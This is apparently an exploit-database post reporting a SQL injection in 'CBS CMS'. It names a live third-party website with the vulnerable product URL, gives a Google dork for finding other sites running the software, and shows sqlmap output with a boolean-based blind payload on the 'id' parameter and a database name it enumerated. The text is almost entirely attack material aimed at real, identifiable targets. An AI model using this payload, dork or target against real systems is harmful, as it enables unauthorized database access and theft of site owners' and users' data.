#Exploit Title: CBS CMS SQL Injection Vulnerability #Date: 2020-10-04 #Exploit Author: Mostafa Farzaneh #Vendor Homepage: cbstech.in #Google Dork: " Developed By CBS" #Category: webapps #Tested On: windows 10, Firefox SQL Injection Demo: https://bazaarmantri.com/product.php?id=40024[SQL Injection Vulnerability] sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=40024 AND 1008=1008 Vector: AND [INFERENCE] back-end DBMS: MySQL >= 5.0.0 available databases : [*] eazaar6n_nbntri ********************************************************* #Discovered by: Mostafa Farzaneh from PywebSecurity team #Telegram: @pyweb_security *********************************************************